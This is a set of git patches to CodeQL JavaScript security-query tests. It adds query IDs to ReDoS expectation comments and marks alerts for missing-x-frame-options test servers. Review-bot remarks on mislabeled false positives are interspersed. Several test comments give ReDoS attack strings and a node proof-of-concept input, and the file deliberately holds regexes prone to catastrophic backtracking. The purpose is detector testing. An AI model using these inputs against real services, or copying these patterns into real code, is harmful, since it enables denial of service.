-var bad5 = /\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)/; // $ Alert - attack: "/" + "\\/a".repeat(100) +var bad5 = /\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)/; // $ Alert[js/redos] - attack: "/" + "\\/a".repeat(100) // Adapted from CodeMirror (https://github.com/codemirror/codemirror), // which is licensed under the MIT license; see file CodeMirror-LICENSE. -var bad6 = /^([\s\[\{\(]|#.*)*$/; // $ Alert - attack: "##".repeat(100) + "\na" +var bad6 = /^([\s\[\{\(]|#.*)*$/; // $ Alert[js/redos] - attack: "##".repeat(100) + "\na" var good4 = /(\r\n|\r|\n)+/; // BAD - PoC: `node -e "/((?:[^\"\']|\".*?\"|\'.*?\')*?)([(,)]|$)/.test(\"'''''''''''''''''''''''''''''''''''''''''''''\\\"\");"`. It's complicated though, because the regexp still matches something, it just matches the empty-string after the attack string. 
-var actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/; +var actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/; // $ Alert[js/redos] // Adapted from Knockout (https://github.com/knockout/knockout), which is // licensed under the MIT license; see file knockout-LICENSE -var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; // $ Alert - attack: "a" + "[]".repeat(100) + ".b\n" +var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; // $ Alert[js/redos] - attack: "a" + "[]".repeat(100) + ".b\n" var good6 = /(a|.)*/; // Testing the NFA - only some of the below are detected. -var bad7 = /^([a-z]+)+$/; // $ Alert -var bad8 = /^([a-z]*)*$/; // $ Alert -var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; // $ Alert -var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; // $ Alert +var bad7 = /^([a-z]+)+$/; // $ Alert[js/redos] +var bad8 = /^([a-z]*)*$/; // $ Alert[js/redos] +var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; // $ Alert[js/redos] +var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; // $ Alert[js/redos] // Adapted from Prototype.js (https://github.com/prototypejs/prototype), which // is licensed under the MIT license; see file Prototype.js-LICENSE. -var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; // $ Alert - attack: "[" + "][".repeat(100) + "]!" +var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; // $ Alert[js/redos] - attack: "[" + "][".repeat(100) + "]!" // Adapted from Prism (https://github.com/PrismJS/prism), which is licensed // under the MIT license; see file Prism-LICENSE. 
-var bad12 = /("|')(\\?.)*?\1/g; // $ Alert - attack: "'" + "\\a".repeat(100) + '"' +var bad12 = /("|')(\\?.)*?\1/g; // $ Alert[js/redos] - attack: "'" + "\\a".repeat(100) + '"' -var bad13 = /(b|a?b)*c/; // $ Alert +var bad13 = /(b|a?b)*c/; // $ Alert[js/redos] -var bad15 = /(a|aa?)*b/; // $ Alert +var bad15 = /(a|aa?)*b/; // $ Alert[js/redos] var good7 = /(.|\n)*!/; -var bad16 = /(.|\n)*!/s; // $ Alert - attack: "\n".repeat(100) + "." +var bad16 = /(.|\n)*!/s; // $ Alert[js/redos] - attack: "\n".repeat(100) + "." var good8 = /([\w.]+)*/; -var bad17 = new RegExp('(a|aa?)*b'); // $ Alert +var bad17 = new RegExp('(a|aa?)*b'); // $ Alert[js/redos] // OK - not used as regexp var good9 = '(a|aa?)*b'; -var bad18 = /(([^]|[^a])*)"/; // $ Alert +var bad18 = /(([^]|[^a])*)"/; // $ Alert[js/redos] // OK - there is no witness in the end that could cause the regexp to not match var good10 = /([^"']+)*/g; -var bad20 = /((.|[^a])*)"/; // $ Alert +var bad20 = /((.|[^a])*)"/; // $ Alert[js/redos] var good10 = /((a|[^a])*)"/; -var bad21 = /((b|[^a])*)"/; // $ Alert +var bad21 = /((b|[^a])*)"/; // $ Alert[js/redos] -var bad22 = /((G|[^a])*)"/; // $ Alert +var bad22 = /((G|[^a])*)"/; // $ Alert[js/redos] -var bad23 = /(([0-9]|[^a])*)"/; // $ Alert +var bad23 = /(([0-9]|[^a])*)"/; // $ Alert[js/redos] -var bad24 = /(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"))?/; // $ Alert +var bad24 = /(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"))?/; // $ Alert[js/redos] -var bad25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"/; // $ Alert +var bad25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"/; // $ Alert[js/redos] var fix25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"/; // OK - fixed version of bad25 -var bad27 = /(([a-z]|[d-h])*)"/; // $ Alert +var bad27 = /(([a-z]|[d-h])*)"/; // $ Alert[js/redos] -var bad27 = /(([^a-z]|[^0-9])*)"/; // $ Alert +var bad27 = 
/(([^a-z]|[^0-9])*)"/; // $ Alert[js/redos] -var bad28 = /((\d|[0-9])*)"/; // $ Alert +var bad28 = /((\d|[0-9])*)"/; // $ Alert[js/redos] -var bad29 = /((\s|\s)*)"/; // $ Alert +var bad29 = /((\s|\s)*)"/; // $ Alert[js/redos] -var bad30 = /((\w|G)*)"/; // $ Alert +var bad30 = /((\w|G)*)"/; // $ Alert[js/redos] var good11 = /((\s|\d)*)"/; -var bad31 = /((\d|\w)*)"/; // $ Alert +var bad31 = /((\d|\w)*)"/; // $ Alert[js/redos] -var bad32 = /((\d|5)*)"/; // $ Alert +var bad32 = /((\d|5)*)"/; // $ Alert[js/redos] -var bad33 = /((\s|[\f])*)"/; // $ Alert +var bad33 = /((\s|[\f])*)"/; // $ Alert[js/redos] -var bad34 = /((\s|[\v]|\\v)*)"/; // $ Alert +var bad34 = /((\s|[\v]|\\v)*)"/; // $ Alert[js/redos] -var bad35 = /((\f|[\f])*)"/; // $ Alert +var bad35 = /((\f|[\f])*)"/; // $ Alert[js/redos] -var bad36 = /((\W|\D)*)"/; // $ Alert +var bad36 = /((\W|\D)*)"/; // $ Alert[js/redos] -var bad37 = /((\S|\w)*)"/; // $ Alert +var bad37 = /((\S|\w)*)"/; // $ Alert[js/redos] -var bad38 = /((\S|[\w])*)"/; // $ Alert +var bad38 = /((\S|[\w])*)"/; // $ Alert[js/redos] -var bad39 = /((1s|[\da-z])*)"/; // $ Alert +var bad39 = /((1s|[\da-z])*)"/; // $ Alert[js/redos] -var bad40 = /((0|[\d])*)"/; // $ Alert +var bad40 = /((0|[\d])*)"/; // $ Alert[js/redos] -var bad41 = /(([\d]+)*)"/; // $ Alert +var bad41 = /(([\d]+)*)"/; // $ Alert[js/redos] // OK - there is no witness in the end that could cause the regexp to not match var good12 = /(\d+(X\d+)?)+/; 
@@ -146,38 +146,38 @@ var good13 = /([0-9]+(X[0-9]*)?)*/; var good15 = /^([^>]+)*(>|$)/; -var bad43 = /^([^>a]+)*(>|$)/; // $ Alert +var bad43 = /^([^>a]+)*(>|$)/; // $ Alert[js/redos] -var bad44 = /(\n\s*)+$/; // $ Alert +var bad44 = /(\n\s*)+$/; // $ Alert[js/redos] -var bad45 = /^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})/; // $ Alert +var bad45 = /^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})/; // $ Alert[js/redos] -var bad46 = /\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}/; // $ Alert +var bad46 = /\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}/; // $ Alert[js/redos] -var bad47 = /(a+|b+|c+)*c/; // $ Alert +var bad47 = /(a+|b+|c+)*c/; // $ Alert[js/redos] -var bad48 = /(((a+a?)*)+b+)/; // $ Alert +var bad48 = /(((a+a?)*)+b+)/; // $ Alert[js/redos] -var bad49 = /(a+)+bbbb/; // $ Alert +var bad49 = /(a+)+bbbb/; // $ Alert[js/redos] var good16 = /(a+)+aaaaa*a+/; -var bad50 = /(a+)+aaaaa$/; // $ Alert +var bad50 = /(a+)+aaaaa$/; // $ Alert[js/redos] var good17 = /(\n+)+\n\n/; -var bad51 = /(\n+)+\n\n$/; // $ Alert +var bad51 = /(\n+)+\n\n$/; // $ Alert[js/redos] -var bad52 = /([^X]+)*$/; // $ Alert +var bad52 = /([^X]+)*$/; // $ Alert[js/redos] -var bad53 = /(([^X]b)+)*$/; // $ Alert +var bad53 = /(([^X]b)+)*$/; // $ Alert[js/redos] var good18 = /(([^X]b)+)*($|[^X]b)/; -var bad54 = /(([^X]b)+)*($|[^X]c)/; // $ Alert +var bad54 = /(([^X]b)+)*($|[^X]c)/; // $ Alert[js/redos] var good20 = /((ab)+)*ababab/; @@ -188,12 +188,12 @@ var good21 = /((ab)+)*abab(ab)*(ab)+/; var good22 = /((ab)+)*/; -var bad55 = /((ab)+)*$/; // $ Alert +var bad55 = /((ab)+)*$/; // $ Alert[js/redos] var good23 = /((ab)+)*[a1][b1][a2][b2][a3][b3]/; -var bad56 = /([\n\s]+)*(.)/; // $ Alert +var bad56 = /([\n\s]+)*(.)/; // $ Alert[js/redos] // OK - any witness passes through the accept state. var good24 = /(A*A*X)*/; 
@@ -201,11 +201,11 @@ var good24 = /(A*A*X)*/; var good26 = /([^\\\]]+)*/ -var bad59 = /(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-/; // $ Alert +var bad59 = /(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-/; // $ Alert[js/redos] -var bad60 = /(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-/ // $ Alert +var bad60 = /(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-/ // $ Alert[js/redos] -var bad61 = /(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-/ // $ Alert +var bad61 = /(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-/ // $ Alert[js/redos] var good27 = /(thisisagoddamnlongstringforstresstestingthequery|imanotherbutunrelatedstringcomparedtotheotherstring)*-/ 
@@ -218,102 +218,102 @@ var good29 = /foo((\uDC66|\uDC67)|(\uDC68|\uDC69))*foo/ var bad62 = /a{2,3}(b+)+X/; // $ MISSING: Alert - cannot currently construct a prefix -var bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/; // $ Alert - and a good prefix test +var bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/; // $ Alert[js/redos] - and a good prefix test var good30 = /(a+)*[^][^][^]?/; // GOOD - but we fail to see that repeating the attack string ends in the "accept any" state (due to not parsing the range `[^]{2,3}`). -var good31 = /(a+)*[^]{2,3}/; +var good31 = /(a+)*[^]{2,3}/; // $ Alert[js/redos] // GOOD - but we spuriously conclude that a rejecting suffix exists (due to not parsing the range `[^]{2,}` when constructing the NFA). -var good32 = /(a+)*([^]{2,}|X)$/; +var good32 = /(a+)*([^]{2,}|X)$/; // $ Alert[js/redos] var good33 = /(a+)*([^]*|X)$/; -var bad64 = /((a+)*$|[^]+)/; // $ Alert +var bad64 = /((a+)*$|[^]+)/; // $ Alert[js/redos] var good34 = /([^]+|(a+)*$)/; // $ SPURIOUS: Alert - The only change compared to the above is the order of alternatives, which we don't model. var good35 = /((;|^)a+)+$/; -var bad65 = /(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f/; // $ Alert - a good prefix test +var bad65 = /(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f/; // $ Alert[js/redos] - a good prefix test -var bad66 = /^ab(c+)+$/; // $ Alert +var bad66 = /^ab(c+)+$/; // $ Alert[js/redos] -var bad67 = /(\d(\s+)*){20}/; // $ Alert +var bad67 = /(\d(\s+)*){20}/; // $ Alert[js/redos] // OK - but we spuriously conclude that a rejecting suffix exists. -var good36 = /(([^/]|X)+)(\/[^]*)*$/; +var good36 = /(([^/]|X)+)(\/[^]*)*$/; // $ Alert[js/redos] // OK - but we spuriously conclude that a rejecting suffix exists. 
-var good37 = /^((x([^Y]+)?)*(Y|$))/; +var good37 = /^((x([^Y]+)?)*(Y|$))/; // $ Alert[js/redos] -var bad68 = /(a*)+b/; // $ Alert +var bad68 = /(a*)+b/; // $ Alert[js/redos] -var bad69 = /foo([\w-]*)+bar/; // $ Alert +var bad69 = /foo([\w-]*)+bar/; // $ Alert[js/redos] -var bad70 = /((ab)*)+c/; // $ Alert +var bad70 = /((ab)*)+c/; // $ Alert[js/redos] -var bad71 = /(a?a?)*b/; // $ Alert +var bad71 = /(a?a?)*b/; // $ Alert[js/redos] var good38 = /(a?)*b/; var bad72 = /(c?a?)*b/; // $ MISSING: Alert -var bad73 = /(?:a|a?)+b/; // $ Alert +var bad73 = /(?:a|a?)+b/; // $ Alert[js/redos] var bad74 = /(a?b?)*$/; // $ MISSING: Alert -var bad76 = /PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)/; // $ Alert +var bad76 = /PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)/; // $ Alert[js/redos] -var bad77 = /^((a)+\w)+$/; // $ MISSING: Alert +var bad77 = /^((a)+\w)+$/; // $ Alert[js/redos] -var bad78 = /^(b+.)+$/; // $ Alert +var bad78 = /^(b+.)+$/; // $ Alert[js/redos] var good39 = /a*b/; // All 4 bad combinations of nested * and +) -var bad79 = /(a*)*b/; // $ Alert -var bad80 = /(a+)*b/; // $ Alert -var bad81 = /(a*)+b/; // $ Alert -var bad82 = /(a+)+b/; // $ Alert +var bad79 = /(a*)*b/; // $ Alert[js/redos] +var bad80 = /(a+)*b/; // $ Alert[js/redos] +var bad81 = /(a*)+b/; // $ Alert[js/redos] +var bad82 = /(a+)+b/; // $ Alert[js/redos] var good40 = /(a|b)+/; var good41 = /(?:[\s;,"'<>(){}|[\]@=+*]|:(?![/\\]))+/; -var bad83 = /^((?:a{|-)|\w\{)+X$/; // $ Alert -var bad84 = /^((?:a{0|-)|\w\{\d)+X$/; // $ Alert -var bad85 = /^((?:a{0,|-)|\w\{\d,)+X$/; // $ Alert -var bad86 = /^((?:a{0,2|-)|\w\{\d,\d)+X$/; // $ Alert +var bad83 = /^((?:a{|-)|\w\{)+X$/; // $ Alert[js/redos] +var bad84 = /^((?:a{0|-)|\w\{\d)+X$/; // $ Alert[js/redos] +var bad85 = /^((?:a{0,|-)|\w\{\d,)+X$/; // $ Alert[js/redos] +var bad86 = /^((?:a{0,2|-)|\w\{\d,\d)+X$/; // $ Alert[js/redos] var bad86AndAHalf = /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/; // $ MISSING: Alert var good43 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)/g; 
-var bad87 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X/g; // $ Alert -var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; // $ Alert -var bad89 = /(x*)+(?=$)/ // $ Alert -var bad90 = /(x*)+(?=$|y)/ // $ Alert +var bad87 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X/g; // $ Alert[js/redos] +var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; // $ Alert[js/redos] +var bad89 = /(x*)+(?=$)/ // $ Alert[js/redos] +var bad90 = /(x*)+(?=$|y)/ // $ Alert[js/redos] // OK - but we spuriously conclude that a rejecting suffix exists. -var good44 = /([\s\S]*)+(?=$)/; -var good45 = /([\s\S]*)+(?=$|y)/; +var good44 = /([\s\S]*)+(?=$)/; // $ Alert[js/redos] +var good45 = /([\s\S]*)+(?=$|y)/; // $ Alert[js/redos] var good46 = /(foo|FOO)*bar/; -var bad91 = /(foo|FOO)*bar/i; // $ Alert +var bad91 = /(foo|FOO)*bar/i; // $ Alert[js/redos] var good47 = /([AB]|[ab])*C/; -var bad92 = /([DE]|[de])*F/i; // $ Alert +var bad92 = /([DE]|[de])*F/i; // $ Alert[js/redos] -var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; // $ Alert -var bad94 = /(a|aa)*$/; // $ Alert +var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; // $ Alert[js/redos] +var bad94 = /(a|aa)*$/; // $ Alert[js/redos] var bad95 = new RegExp( "(a" + 
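Review bot: `good31`, `good32`, `good36`, `good37`, `good44` and `good45` gain a plain `// $ Alert[js/redos]`, although the comment above each says the pattern is safe and the result is a false positive. `good34` in the same hunk uses `// $ SPURIOUS: Alert`, and that marker is what keeps known false positives distinguishable from true ReDoS findings when the expectations are read later. Suggested form: `var good31 = /(a+)*[^]{2,3}/; // $ SPURIOUS: Alert[js/redos]`, and likewise for the other five. The same hunk also turns `bad77` from `$ MISSING: Alert` into an expected alert, which goes beyond the commit title of adding query IDs and deserves a line in the description.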
@@ -330,16 +330,16 @@ var bad96 = new RegExp("(" + var bad97 = new RegExp( "(g|gg" + - ")*h$"); // $ Alert + ")*h$"); // $ Alert[js/redos] -var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; // $ Alert +var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; // $ Alert[js/redos] var good48 = /(\/(?:\/[\w.-]*)*){0,1}:([\w.-]+)/; -var bad99 = /(a{1,})*b/; // $ Alert +var bad99 = /(a{1,})*b/; // $ Alert[js/redos] -var unicode = /^\n\u0000(\u0000|.)+$/; +var unicode = /^\n\u0000(\u0000|.)+$/; // $ Alert[js/redos] -var largeUnicode = new RegExp("^\n\u{1F680}(\u{1F680}|.)+X$"); +var largeUnicode = new RegExp("^\n\u{1F680}(\u{1F680}|.)+X$"); // $ Alert[js/redos] var unicodeSets = /(aa?)*b/v; From 1fcebcec8716a213439b810f5d268556e79b97e8 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 14:29:35 +0100 Subject: [PATCH 088/892] JS: Move some ReDoS alerts --- .../ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 6be96967a643..c2f83ed25aee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js 
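Review bot: `unicode` and `largeUnicode` now expect `Alert[js/redos]`, but the last context line `var unicodeSets = /(aa?)*b/v;` stays without any expectation. `(aa?)*b` has the same ambiguous repetition as `bad15 = /(a|aa?)*b/`, so if the query reports nothing for it, that is presumably a false negative under the `v` flag and not a safe pattern. If so, record it as `var unicodeSets = /(aa?)*b/v; // $ MISSING: Alert[js/redos]` so the gap is visible in the test.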
@@ -319,14 +319,14 @@ var bad95 = new RegExp( "(a" + "|" + "aa)*" + - "b$" -); // $ Alert + "b$" // $ Alert[js/redos] +); var bad96 = new RegExp("(" + - "(c|cc)*|" + - "(d|dd)*|" + + "(c|cc)*|" + // $ Alert[js/redos] + "(d|dd)*|" + // $ Alert[js/redos] "(e|ee)*" + -")f$"); // $ Alert +")f$"); // $ Alert[js/redos] var bad97 = new RegExp( "(g|gg" + From a0f8e287907732be0383d21ca86178b3d904273f Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 14:30:15 +0100 Subject: [PATCH 089/892] JS: Accept a fixed FN --- javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index c2f83ed25aee..53385682867a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -216,7 +216,7 @@ var good28 = /foo([\uDC66\uDC67]|[\uDC68\uDC69])*foo/ var good29 = /foo((\uDC66|\uDC67)|(\uDC68|\uDC69))*foo/ -var bad62 = /a{2,3}(b+)+X/; // $ MISSING: Alert - cannot currently construct a prefix +var bad62 = /a{2,3}(b+)+X/; // $ Alert[js/redos] var bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/; // $ Alert[js/redos] - and a good prefix test From cded75766f8c5b878358f9bf79888010a7533b41 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 14:30:32 +0100 Subject: [PATCH 090/892] JS: Add a query ID --- javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 53385682867a..c5b183cb273d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js 
@@ -234,7 +234,7 @@ var good33 = /(a+)*([^]*|X)$/; var bad64 = /((a+)*$|[^]+)/; // $ Alert[js/redos] -var good34 = /([^]+|(a+)*$)/; // $ SPURIOUS: Alert - The only change compared to the above is the order of alternatives, which we don't model. +var good34 = /([^]+|(a+)*$)/; // $ SPURIOUS: Alert[js/redos] - The only change compared to the above is the order of alternatives, which we don't model. var good35 = /((;|^)a+)+$/; From cea53371f2dfceefdded5a1e0c22a6d8bdaf3cae Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:01:58 +0100 Subject: [PATCH 091/892] JS: Accept alerts for missing-x-frame-options --- javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/express-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/node-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js index 33372750e587..e224100b4ade 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js @@ -1,7 +1,7 @@ var connect = require('connect'); var http = require('http'); -var app = connect(); +var app = connect(); // $ Alert app.use(function (req, res){ diff --git a/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js index a5b05b3a16b9..7aa58b6b4e15 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js 
@@ -1,5 +1,5 @@ var express = require('express'), - app = express(); + app = express(); // $ Alert app.get('/', function (req, res) { diff --git a/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js index 12a18c1cbef5..b9e5d447e72d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js @@ -1,5 +1,5 @@ var Hapi = require('hapi'); -var server = new Hapi.Server(); +var server = new Hapi.Server(); // $ Alert server.route({ handler: function (request, reply){ diff --git a/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js index 8308b19bee75..5ae9cfe130c4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js @@ -1,5 +1,5 @@ var Koa = require('koa'); -var app = new Koa(); +var app = new Koa(); // $ Alert app.use(function handler(ctx){ }); diff --git a/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js index 4e5fbb685497..2bc553aa7852 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js @@ -1,4 +1,4 @@ var http = require('http') http.createServer(function (request, response) { - }).listen(9615) + }).listen(9615) // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js index 3b88523e701a..e48a51efa7e8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js 
@@ -1,5 +1,5 @@ var restify = require('restify'); -var server = restify.createServer(); +var server = restify.createServer(); // $ Alert server.head('/', function (request, response){ }); From 260c66b3cf268db2b9c902451b4eb3497fd6d258 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:02:18 +0100 Subject: [PATCH 092/892] JS: Mark a spurious alert in missing-x-frame-options --- .../query-tests/Security/CWE-451/express-good-array-routers.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js b/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js index efe2e732b552..53efa1cc9537 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js @@ -1,5 +1,5 @@ var express = require('express'), - app = express(); + app = express(); // $ SPURIOUS: Alert app.get('/', [ function (req, res){ From 48760d66b23e7bf6d3183688d31d983a8f1d64f1 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:04:26 +0100 Subject: [PATCH 093/892] JS: Accept alerts for HardcodedDataInterpretedAsCode --- .../ql/test/query-tests/Security/CWE-506/event-stream-orig.js | 2 +- javascript/ql/test/query-tests/Security/CWE-506/event-stream.js | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js b/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js index 85daa2d86954..95c1cc3fee66 100644 --- a/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js +++ b/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js 
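Review bot: In express-good-array-routers.js the new `// $ SPURIOUS: Alert` on `app = express();` gives no reason for the false positive. ReDoS/tst.js documents its spurious result on `good34` with a reason, and a reason here would tell a later reader what the missing-x-frame-options query fails to model. The file name suggests route handlers passed as an array, but the rest of the file is outside the hunk, so the cause cannot be confirmed from here. Suggested form: `app = express(); // $ SPURIOUS: Alert - <reason the header setup is not recognised>`.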
